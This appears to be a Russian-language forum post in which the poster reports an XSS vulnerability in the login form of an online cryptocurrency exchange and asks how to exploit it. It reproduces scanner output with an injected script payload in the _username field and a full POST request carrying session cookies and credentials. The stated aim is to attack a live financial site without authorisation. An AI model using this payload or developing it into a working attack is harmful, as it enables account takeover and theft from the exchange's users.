В общем нашел уязвимость на сайте онлайн обменника криптовалют но не знаю как раскрутить ее.
HTTP REQUEST
Код:
Cross site scripting
Vulnerability Description
arrow_drop_up
Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts into a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.
The vulnerability affects https:///login_check , _username
Discovered by Cross site scripting
Attack Details
arrow_drop_up
URL encoded POST input _username was set to pHqghUme'"()&%<acx><ScRiPt >pAQg(9047)</ScRiPt>HTTP REQUEST
Код:
POST /login_check HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: https:///
Cookie: __cfduid=d08c372faf779efa503ead57943b1d9261586247757;PHPSESSID=vmdaulim5euek61tkgtldu0rab;hl=ru;suid=f96c86ef69d2ef026b7691d8534b98c7f1e52b74
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 201
Host: exchanger1.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
_csrf_token=bnRWJtnKjLzlUSPSQzMacZC6RkbVRDsCooR_2GT_SEw&_password=g00dPa%24%24w0rD&_remember_me=on&_submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8&_username=pHqghUme'"()%26%25<acx><ScRiPt%20>pAQg(9047)</ScRiPt>